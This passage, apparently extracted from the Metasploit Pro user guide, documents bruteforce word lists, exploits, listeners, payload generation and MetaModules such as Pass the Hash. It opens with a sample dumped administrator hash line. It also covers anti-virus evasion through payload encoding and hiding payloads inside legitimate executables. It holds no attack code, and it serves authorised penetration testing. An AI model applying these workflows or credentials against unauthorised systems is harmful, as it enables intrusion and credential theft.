administrator:501:de8130a284642c74523fa0f66c35ef02:421a1c7abc7b160c20ed78a2e06e09c8:::
Credential Management
229
User names and passwords can contain non-ASCII in \xXX notation. For example, you can denote spaces within a user name or password as \x20. When you use a user name and password file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have a list of user names and passwords. Example: username1 passwordA username2 passwordA passwordB username3 passwordA passwordB passwordC
Passwords only
A passwords only file is a text file that contains only passwords. There can be only one password for each line in the file. Metasploit Pro assigns the passwords to known user names. Passwords can contain non-ASCII in \xXX notation. For example, you can enter testuser d\xeadb\xeef. When you use a plain password file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a user names to each password. Use the plain password format if you have a list of passwords and you want Metasploit Pro to specify user names to test against.
Example:
password1 password2 password3
230
When you use a user names only file, do not use the imported only bruteforce depth. You must choose a different bruteforce depth so that Metasploit Pro can assign a password to each user name.
Example:
jack joe john
231
Word Lists
A word list is an exhaustive list of common passwords and terms that a bruteforce attack or password cracker can use to attempt to guess the login credentials for a particular account. By default, Metasploit Pro provides several different word lists, but you can add your own custom word lists for the bruteforce attack to use.
Word Lists
232
6. Click Show Advanced Options and configure any additional options for the bruteforce attack. 7. Under Credential Selection, locate the Imported Credential Files list. Select the credential file, or keyword list, that you want to use. 8. Run the bruteforce attack.
l l
233
Chapter 10:
Exploitation
About Exploitation on page 235 Components of an Exploit on page 237 Common Exploitation Tasks on page 238 Automated Exploits on page 235 Manual Exploits on page 235
About Exploitation
An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. Exploits include buffer overflow, code injection, and web application exploits. Metasploit Pro offers automated exploits and manual exploits. The type of exploit that you use depends on the level of granular control you want over the exploits.
Automated Exploits
When you run an automated exploit, Metasploit Pro builds an attack plan based on the service, operating system, and vulnerability information that it has for the target system. Automated exploits cross reference open ports, imported vulnerabilities, and fingerprint information with exploit modules. The attack plan defines the exploit modules that Metasploit Pro will use to attack the target systems. An automated exploit uses reverse connect or bind listener payloads and does not abuse normal authenticated control mechanisms. To run an automated exploit, you must specify the hosts that you want to exploit and the minimum reliability setting that Metasploit Pro should use. The minimum reliability setting indicates the potential impact that the exploits have on the target system. If you use a high ranking, such as excellent or great, Metasploit Pro uses exploits that will be unlikely to crash the service or system. Exploits that typically have a high reliability ranking include SQL injection exploits, web application exploits, and command execution exploits. Exploits that corrupt memory will most likely not have a high reliability ranking. You can also specify the payload type that you want the exploit to use. By default, automated exploits use Meterpreter, but you can choose to use a command shell instead.
Manual Exploits
A manual exploit is a module that you can select and run individually. You perform a manual exploit when you want to exploit a known vulnerability. You choose the exploit module based on the information you have about the host. For example, if you know that the host runs Windows Service Pack 1, you can run an exploit that targets Windows Service Pack 1 vulnerabilities. Or if you know that the target system has a specific vulnerability that you want to test, you can run the exploit that targets that particular weakness.
About Exploitation
235
Manual exploitation provides granular control over the module and evasion options that an exploit uses. Whereas automated exploits enable you to run simultaneously multiple exploits, manual exploits enable you to run one exploit at a time. The options and instructions that you perform for manual exploits vary based on the exploit that you choose to run. Therefore, use the following instructions as a guideline to manually run exploits.
Manual Exploits
236
Components of an Exploit
The following sections describe the different components that make up an exploit.
Module
A module is a prepackaged collection of code that performs a specific task, such as run a Nmap scan or a particular exploit.
Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. There are a couple of types of payloads: reverse shell and bind shell. The major difference between a reverse shell and a bind shell is how the shell enables you to connect to the exploited system. A reverse shell creates a connection from the target machine back to you as a command prompt. A bind shell, on the other hand, attaches a command prompt to a listening port on the exploited system. You can connect to the bind shell to access the exploited system.
Listeners
After an exploit successfully compromises a target system, Metasploit Pro uses a listener to wait for an incoming connection from the exploited system. The listener is the component that handles persistent agents from exploited systems. When you create a listener, you associate the listener to a specific project. Therefore, when an exploited target makes a connection with the listener, you see an active session open in the project. Note: You can create global listeners that you can use across multiple projects. However, only one project can use the listener at a time. You assign a post-exploitation macro to each listener. When the exploited system makes a connection with the attacking system, Metasploit Pro launches the post-exploitation macro. Listeners stop after you delete a project or you manually stop a listener.
Components of an Exploit
237
238
9. Define the exploit selection options. This determines the ports that the exploit includes and excludes from the attack. 10. Define the advanced options. The advanced options lets you define the number of exploits you can run concurrently, the time out for each exploit, and evasion options. 11. Run the exploit.
Setting Up a Listener
1. Select Administration > Global Settings from the main menu. 2. Click New Listener, which is located under Persistent Listeners. 3. When the Create a Listener window appears, choose an associated project for the listener. 4. Define the listener payload type. 5. Enter an IP address for the listener.
239
6. Enter a port for the listener. 7. Choose a post-exploitation macro to deploy after the listener connects to the target system. Enable the listener. 8. Save the listener.
Stopping a Listener
To stop a listener, you can either delete the listener from the system or you can stop the listener from the Task screen. 1. From within a project, click the Tasks tab. 2. Find the listening tasks. 3. Click the Stop button in the Timestamp/Duration column.
240
Chapter 11:
Payloads
You use the payload generator when you need to build a standalone binary file that delivers a custom-built payload. Binary files, such as .exe and .bin files, are typically delivered through client-side exploits, such as phishing e-mails or social engineering attacks, which means that you will probably need to be able to bypass anti-virus detection to execute the shellcode on the target system. To help reduce anti-virus detection, the Payload Generator enables you to do things like encode the payload and use a dynamic executable. Payloads are generated globally, outside the context of a project. This means that payloads are generated on the fly, can only be downloaded once, and are not tied to a particular project. They are useful when you need to quickly generate a executable payload for a single use.
242
Command - A command execution payload that enables you to execute commands on the remote machine.
243
Option
l
Description Meterpreter - An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.
Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. Choose one of the following stagers: Stager
l
Reverse TCP - Creates a connection from the target machine back to the Metasploit server over TCP. Bind TCP - Binds a command prompt to a listening port on the target machine so that the Metasploit server can connect to it. Reverse HTTP - Creates a connection from the target machine back to the Metasploit server over HTTP. Reverse HTTPS - Creates a connection from the target machine back to the Metasploit server over HTTPS.
Specifies the payload that is delivered by the stager. Defines the IP address the payload connects back to. (Reverse connections only) Defines the port the payload connects back to. Defines the port that the listener binds to. (Bind connections only)
244
3. Click the Stager dropdown and choose one of the following: Reverse TCP, Bind TCP, ReverseHTTP, or Reverse HTTPS.
4. Click the Stage dropdown and choose the stage you want the stager to download.
The list will display applicable stages for the stager you have selected. 5. Enter the IP address that you want to the payload to connect back to in the LHOST field. (Reverse connections only) 6. Enter the port that you want the payload to connect back to in the LPORT field. 7. Enter the port that you want the listener to bind to in the RHOST field. (Bind connections only) 8. Click Generate. If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically download the executable.
245
If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the executable to your computer.
Description
AIX Android BSD sparc and x86 BSDi Firefox Java Linux armle, cbea. cbea64, java, mipsbe, mipsle, ppc, ppc64, x86, and x86_64 Netware NodeJS OSX armle, java, ppc, x86, and x86_64 PHP armbe, armle, cbea. cbea64, cmd, dalvik, firefox, java, mips, mipsbe, mipsle, nodejs, php, ppc, ppc64, python, ruby, sparc, x86, and x86_64
Architecture
246
Option
l
Description Solaris java, sparc, and x86 Unix cmd, java, and tty Windows cmd, java, x86, and x86_64
Specifies the type of payload that the exploit will deliver to the target. Payload The Payload Generator shows you the payloads that are available for the platform you have selected. Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. Stager The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. The list of stagers that are available will vary based on the platform and architecture that you have selected. Specifies the function to call when a payload completes so that it can safely exit a thread. Choose one of the following exit functions:
l
Exit Function
l
Thread - Calls the ExitThread API function. Process - Calls the ExitProcess API function. SEH - Restarts the thread when an error occurs. None - Enables the thread to continue executing so that you can serially run multiple payloads together.
Defines the IP address that you want the target host to connect back to. Defines the port that you want to use for reverse connections. Enables you to specify an additional the shellcode file that will run in a separate, parallel thread while the main thread executes the payload. Defines the length of the NOP sled you want to prepend to the payload.
Size of NOP Sled Each NOP you add to the payload adds 1 byte to the total payload size.
Note: The options that are available for a payload vary based on its architecture, platform. and payload type.
247
There are many different encoders that are available in the Metasploit Framework, which can be used for various situations. For example, some encoders, such as alpha_mixed and alpha_lower, can be used to replace characters with all alphanumeric characters, which can be useful for applications that only accept text-based characters as input. Other encoders, such as the very reliable and highly ranked shikata_ga_nai, are polymorphic XOR encoders that use an XOR encrypting scheme to help evade detection. Encoding options are only available for the following platforms:
l
AIX BSD sparc BSD x86 BSDi Linux mipsbe Linux mipsle Linux ppc Linux x86
Linux x86_64 Netware OSX ppc OSX x86 OSX x86_64 PHP Platform sparc Platform x86
Platform x86_64 Python cmd Solaris sparc Solaris x86 Unix cmd Windows cmd Windows x86 Windows x86_64
248
Encoding Options
You can use the following options to encode a payload: Option Description Sets the encoder that is used to encode the payload. Encoder The Payload Generator only displays the encoders that are applicable to the platform and architecture you have selected. Specifies the number of times that you want to encode the payload. Number of Iterations The more times you encode a payload, the larger the payload becomes. You may need to modify the number of iterations if it causes the payload to exceed the maximum payload size. Defines the maximum size of the resulting payload in bytes. The maximum size takes precedence over the encoding iterations. If the encoder Maximum Size of Payload causes the payload to exceed the maximum size you have specified, the Payload Generator will display an error message. To fix the error, you can select a new encoder, modify the number of iterations, or set a different maximum payload size. Specifies the list of characters that you do not want to appear in the payload, such as spaces, carriage returns, line feeds, tabs, and null bytes. Bad Characters You must enter the values in hex. You can copy and paste the hex characters into the text box. The text editor will attempt to format the hex
Output Options
You can use the following options to create the binary file: Option Format Choose from the following formats: executable, raw bytes, or shellcode buffer. Enables you to inject the payload into an existing executable and retain the original Preserve original functionality of executable functionality of the original executable. The resulting executable will function like the original one. You should only enable this option only if you have uploaded a template file. Description Specifies the format to use to output the payload.
249
Option
Description Specifies the executable template that you want to use to run in the main thread. For
Template file
example, you can embed the payload in an executable, like calc.exe. When the executable runs, it creates a separate thread for the payload that runs in the background and continues to run calc.exe in the main thread.
3. Click the Platform dropdown button and choose one of the available platforms.
For a list of supported platforms, see Classic Payload Options on page 246. 4. Click the Architecture dropdown button and select one of the available processor architecture types.
250
The list of architecture types will vary based on the platform that you have selected. Some platforms, such as Android and AIX, will not have a platform. From this point on, the steps will vary depending on the platform, architecture, and payload you have selected. Generally, you will need to specify the LHOST (reverse), LPORT, and RHOST (bind) that the payload uses, as well as the output options for the executable. You can also do things like encode the payload. For more information on payload options, see Classic Payload Options on page 246. For more information on output options, see Output Options on page 249. For more information on encoding options, see
If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically start the download process. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the payload to your computer.
251
Listeners
A listener is the component that waits for an incoming connection from an exploited system. You must set up a listener if you intend to establish a connection between your Metasploit server and the exploited machine. For example, if you have delivered an executable to a target host, you will need to set up a listener to wait for a connection from it. When the host connects to the listener, a session opens on their machine, which will enable you to interact with it to do things like collect evidence from their system. In Metasploit Pro, you can set up persistent listeners, which will continuously listen for connect backs from a compromised host. You can set up a persistent listener from the Global Settings area of the web interface. Each listener is bound to a specific project. To set up a listener, you will need to define the listening host, listening port, and payload type. You can also assign a post-exploitation macro to the listener, so that when the exploited system makes a connects back to the listener, Metasploit Pro runs the macro.
Setting Up a Listener
1. Select Administration > Global Settings. 2. Find the Persistent Listeners section. 3. Click the New Listener button. 4. When the Create a Listener form appears, specify the following:
l
Associated project - Choose the project you want to use to access and manage open sessions. Listener payload - Choose the appropriate payload for the listener. Listener Address - Specify the IP address that you want the payload to connect back to (e.g., the IP address of the Metasploit server). Listener Port - Specify the port you set up for the handler when you generated the Windows Meterpreter Reverse TCP payload (e.g., 4444).
Listeners
252
Chapter 12:
MetaModules
About MetaModules on page 254 Segmentation and Firewall Testing MetaModule on page 280 Known Credentials Intrusion MetaModule on page 276 Passive Network Discovery MetaModule on page 284 Pass the HashMetaModule on page 271 Single Password Testing MetaModule on page 261 SSH Key Testing MetaModule on page 267
About MetaModules
AMetaModule is a Metasploit Pro feature that provides a guided interface to walk you through a singular penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing or passive network discovery, but enables you to quickly configure and run the module with minimal set up. Traditionally, in Metasploit Pro, there is a quite a bit of manual configuration that you have to do in order to perform certain tasks. It requires knowledge of the various modules that are available in the Metasploit Framework and an understanding of how to configure and use them. This process can be daunting. This is where MetaModules come into the picture. The best way to think of a MetaModule is to think of them as modules with wizards. Like regular modules, they are prepackaged mini programs that you can run to perform a specific task, such as bruteforcing or scanning a target. Unlike modules, MetaModules guide you through its configuration. For example, most MetaModules need you to define the target scope, set up the test options, and generate a report. MetaModules are added and updated to Metasploit Pro regularly, so you should always grab the latest software update to get the newest MetaModules. To see all the latest MetaModules, select Modules > MetaModules from the Main Menu.
About MetaModules
254
MetaModule Runs
Select Modules > MetaModules from the Main Menu. When the Overview pages appears, click the View All button. The MetaModule Runs page appears.
255
From the MetaModules Runs page, you can view the findings for a MetaModule and delete a MetaModule run from the project.
MetaModule Findings
After you launch a MetaModule run, the Findings window appears and shows you the real time statistics and the events for the MetaModule run.
Statistics - Shows real-time statistics for the MetaModule run. The information that the Findings window varies based on the MetaModule that is running. Task Log - Shows a detailed log of events for a MetaModule run.
You can click on the Statistics tab or the Task Log tab to switch between views on the Findings window.
MetaModule Findings
After a MetaModule completes its run, you can view the findings for the test from the MetaModule Runs page. The findings vary based on the MetaModule you choose to view. The following list describes the information that each MetaModule reports on the Findings window.
l
Firewall Egress Test Findings - Shows the total number of open ports, closed ports, and filtered ports. Passive Network DiscoveryFindings - Shows the number of total packets captured, data captured, and hosts that were identified. Known Credentials Intrusion Findings - Shows the total number of hosts that the MetaModule attempted to authenticate and the number of sessions it was able to open. Pass the Hash Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
MetaModule Findings
256
Single Password Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins. SSH Key Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
3. Find the MetaModule run that you want to view the findings for. 4. Click Findings. The Findings window appears and shows you the results from the MetaModule run.
MetaModule Findings
257
To view the last run stats, select Modules >MetaModules from the Main Menu. The Overview Page appears and shows the last run stats at the top of the page.
MetaModule Findings
258
3. Find the MetaModule Run that you want to stop. It must have a Running status. 4. Click Stop. The status changes from Running to Aborted.
259
260
Lockout Risks
An account lockout disables an account and prevents you from accessing the account for the duration of the lockout period. When you configure the Single Password Testing MetaModule, you should factor in the lockout risk for the services that you choose. Each service is categorized into the following lockout risks:
l
Low Risk - Any service that typically does not enforce account lockouts, such as AFP, DB2, EXEC, FTP, HTTP, HTTPS, LOGIN, Oracle, Postgres, SHELL, SNMP, SSH_PUBKEY, Telnet, and VNC. Medium Risk - Any service that typically enforces account lockouts, such as MSSQL, MySQL, POP3, and SSH. High Risk - Any service that uses Windows authentication, such as PC Anywhere, SMB, vmauthd, and WinRM.
261
2. Find the Single Password Testing MetaModule and click the Launch button. The Single Password Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test. The target address range must match the hosts in the workspace.
262
4. Click on the Services and Ports tab. The Services form appears.
5. Select the services that you want to attempt to authenticate. All services are categorized based on their lockout risk, which is the likelihood that the service enforces account lockouts. 6. Click on the Credentials tab. The Credentials form appears. 7. You can choose one of the following options to supply the MetaModule with credentials:
263
Enter a known credential pair - You need to manually enter the user name and password combination that you want the MetaModule to use. Use this method for credentials obtained from phishing attacks. Choose an existing credential pair - You can select the user name and password combination from a list of known credentials. These credentials were obtained from a bruteforce attack, discovery scan, or data import.
264
9. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name. 10. Select PDF, Word, RTF, or HTML for the report format. 11. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted
265
to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab. After the MetaModule completes its run, you should go the Reports area to view the Single Password Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of authenticated services and hosts. For a more detailed look at the compromised hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
266
267
2. Find the SSH Key Testing MetaModule and click the Launch button. The SSH Key Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
4. Click on the Credentials tab. The Credentials form appears. 5. Choose one of the following options to supply the MetaModule with an SSH private key:
268
Enter a known credential pair- You need to manually enter the user name, and then browse to the location of the private key that you want the MetaModule to use. Choose an existing SSH key - You can select a user name and SSH key from a list of looted keys. These keys were obtained from a bruteforce attack, discovery scan, data import, or exploited system.
6. Click the Report tab. The Report configuration form appears. 7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
269
9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 11. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, you should go the Reports area to view the SSH Key Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
270
271
2. Find the Pass the Hash MetaModule and click the Launch button. The Pass the Hash window appears.
3. From the Scope tab, enter the target address range you want to use for the test in the Address Range field.
4. If there are any hosts that you want to blacklist from the test, click on the Advanced dropdown link and enter the addresses for those hosts in the Excluded Addresses field. 5. Click on the Credentials tab. The Credentials configuration form appears. 6. Choose one of the following options to supply the MetaModule with a raw NTLM hash:
272
Enter a known credential pair - You need to manually enter the user name, and then enter the raw hash that you want the MetaModule to use. You should leave WORKGROUP as the domain name in order to authenticate to the local machine. Choose an existing SMB hash - You can select a user name and hash from a list of looted password hashes that are stored in the project.
7. Click the Generate Report tab. The Report configuration form appears.
273
8. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
9. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
10. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
274
11. From the Options area, select the Mask discovered passwords option if you want to obscure any password hashes that the report contains.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and tasks log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, you should go the Reports area to view the Pass the Hash Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
275
276
2. Find the Known Credentials Intrusion MetaModule and click the Launch button. The Known Credentials Intrusion window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
277
5. Specify the following settings that you want to use for the payload:
l
Payload type - Choose Meterpreter for Windows or Command shell for Linux systems. Connection - Choose one of the following connection types: Auto - Automatically selects the payload type. In most cases, the Auto option selects the reverse shell payload because it is more likely to establish a connection between a target machine and the attacking machine. Reverse - Select this option if the targets are behind a firewall or use NAT. Typically, a reverse shell payload will work for most situations. Bind - Select this option if the target devices are unable to initiate a connection.
278
Listener Ports - The port that you want the listener to listen on for incoming connections. By default, ports 1024-65535 are selected; however, you can define a specific port that you want the listener to use, such as 4444. Listener Host - The IP address that you want the target machine to connect back to. This is typically going to be the IP address of your local machine. If you do not specify a listener host, the MetaModule automatically uses the IP address of your local machine.
6. Click the Generate Report tab. The Report configuration form appears. 7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
10. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED** . By default, this option is disabled. You should enable this option if you plan to distribute the report.
11. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 12. Click the Launch button.
279
Port States
The Segmentation and Firewall TestingMetaModule uses the following states to categorize ports.
Open
A port is assigned an open state if it allows traffic out of the network and the EGADZ server receives it. An open state indicates that there is an application that is actively accepting TCP connections, UDP datagrams or SCTP associations.
Filtered
A port is assigned a filtered state if it drops the traffic before it reaches the desired port on the EGADZ server. It will not receive a response from the EGADZ server. Typically, a port has a filtered state if a dedicated firewall device, router rules, or host-based firewall software has successfully blocked the port from sending traffic.
280
Closed
A port is assigned a closed state if it allows traffic through the port, but there is not an application or service bound to the port. A closed port can be used to determine if t a host is up on an IPaddress.
Unfiltered
A port is assigned an unfiltered traffic if it allows traffic through to the port, but it cannot be determined whether the port is open or closed.
2. Find the Segmentation and Firewall Testing MetaModule and click the Launch button.
The Segmentation and Firewall Testing configuration window appears. 3. From the Scan Config tab, choose one of the following scan target options:
l
Use default egress target - The MetaModule runs against the egress server that Metasploit has set up for testing outbound traffic.
281
Use a custom egress target - The MetaModule runs against a server that you have set up for testing outbound traffic. You can specify an IP or a fully qualified domain name. To learn how to set up a custom egress target, go to the Global Tools area located on the Projects page and download the Segmentation Target Setup Script. You can follow the instructions provided in the script to create a custom egress server.
4. From the Scan Config tab, choose one of the following port range options:
l
Use default nmap port set - Scans Nmaps 1000 most common ports. Use a custom port range option - Scans the range of ports that you define.
282
5. Click the Generate Report tab.The Report configuration form appears. 6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections. 8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define mail server settings, select Administration > Global Settings > SMTP Settings. 9. Click the Launch button.
283
2. Find the Passive Network Discovery MetaModule and click the Launch button. The Passive Network Discovery window appears.
284
3. From the Pcap Configuration tab, select the Network Interface Card (NIC) you want to use to capture traffic. Metasploit Pro automatically detects the interfaces that are available.
4. Use the sliders to define the following limits for the packet capture:
l
Timeout - The time limit for the capture, in seconds. Max File Size - The maximum file size for each file captured, up to 512 MB. Max Total Size - The maximum size of the entire Pcap file, up to 2 GB. This value must be larger than the Max File Size. Note: The packet capture runs until it meets the timeout limit or the maximum Pcap file size limit.
5. Click on the Filters tab. The Berkeley PacketFilters page appears. 6. Choose one of the following options, if you want to specify a BPF string:
285
Select Protocols from the following list - Choose this option if you want the MetaModule to automatically generate the BPF string based on the protocols and ports you have selected. The Passive Network Discovery MetaModule provides a list of the most common ports and services that you can choose from. After you select the protocols and ports for the BPF string, you can view the generated string at the bottom of the Filters page.
Manually enter a BPFstring - Choose this option if you want to manually define the BPF string. For more information on BPF syntax, visit http://biot.com/capstats/bpf.html.
286
5. Click the Report tab. The Report configuration page appears. 6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. Select whether you want to generate the report as a PDF, RTF, or HTML file.
287
8. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
9. Select the Mask discovered passwords options if you want to hide discovered credentials from the report.
10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
288
11. Click the Launch button. When the MetaModule launches, the Findings window appears. It contains the statistics and task log for the MetaModule run. You can track the total number of packets, bytes, and hosts that the MetaModule captures in real-time.
After the MetaModule completes its run, you should go the Reports area to view the Passive Network Discovery Findings Report that the MetaModule generated. The report provides detailed information about the services and credentials that the MetaModule was able to capture for each host, as well as a graphical breakdown of the operating systems and services that were found.
289
MetaModule Reports
A report provides insight into an organization's security infrastructure. The goal of a report is to clearly convey the outcome of a penetration test to your readers . Each report in Metasploit Pro contains a high-level summary of results along with the technical details of the test. The report is organized into logical sections, which makes it easy to navigate and find key information. This is extremely useful in cases where you may need to share a single report across an organization. Since the audience may be a mix of a technical and non-technical readers, it is important that each report conveys data in a way that is useful and valuable to each type of reader. For example, senior management may want to quickly glance at the report, so a summary that visually relays the most significant information will most likely resonate the most with them. The IT or security teams, on the other hand, will be more interested in the technical details of the test, so they can mitigate any issues that were exposed by the test. In Metasploit Pro, each MetaModule includes a specialized report. Each report contains information that is specific to the MetaModule that generates it. Each time you run a MetaModule, it automatically generates a report that details its findings. The data within each report represents a static snapshot of a target network and can be used as a benchmark to measure an organization's security posture. The following reports are available for MetaModules:
l
FirewallEgress Testing Report Passive Network Discovery Report Known Credentials Intrusions Report Single Password TestingReport SSH KeyTesting Report Pass the Hash Report
MetaModule Reports
290
3. Click on the Generate Report tab. 4. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name. 5. Choose whether you want to generate the report as a PDF, HTML, or RTF file. 6. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections. 7. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED** . By default, this option is disabled. You should enable this option if you plan to distribute the report. 8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings. 9. Configure the remaining options for the MetaModule, such as the scope of the test. When you are done, click the Launch button to run the MetaModule.
291
ID 1 2 3
Report Section Title Page Project Summary Egress Summary Port State Distribution
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the egress scan target used, port range scanned, and the run time for the test. Shows a graphical breakdown of the critical and registered ports that are opened, filtered, and closed. If no data is available, then the report does not show a graph. Lists all open critical ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report. Lists all open registered ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.
292
ID 7 8
Report Description Provides additional information about port states, port groups, and services. Lists the options that were used to generate the report.
ID 1 2
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the packet capture details, such as the total capture time, number of packets captured, and the amount of data captured. The section also summarizes the number of hosts, services, and credentials the MetaModule discovered. Shows a graphical breakdown of hosts and services that the MetaModule discovered. If no data is available, then the report does not show a graph. Lists each host the MetaModule was able to discover and shows any ports it was able to enumerate. Lists the options that were used to generate the report.
Findings Summary
4 5 6
Host and Service Distribution Detailed Findings Appendix: Report Generation Options
293
ID 1 2
Report Description The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents. Lists the project name and the user who generated the report. Lists the name of the MetaModule that was run, the test runtime, and the user name/password combination used to authenticate to a target range of hosts. If you enabled the Mask discovered passwords option when you configured the report settings, the report displays a masked password. The report also displays the number of hosts that the MetaModule targeted, the number of services that it attempted to log in to, and the number of successful logins it was able to obtain.
Findings Summary
Authenticated Hosts Shows a graphical breakdown of hosts and services that the MetaModule and Services was able to authenticate to. If no data is available, the report does not show Summary Charts a graph. Detailed Findings Appendix: Report Generation Options Lists the services and session details for each host that the MetaModule was able to authenticate to. Lists the options that were used to generate the report.
5 6
294
Chapter 13:
Web Scans on page 296
WebApplicationTests
To learn more about web application tests, read the following topics:
l
Web Scans
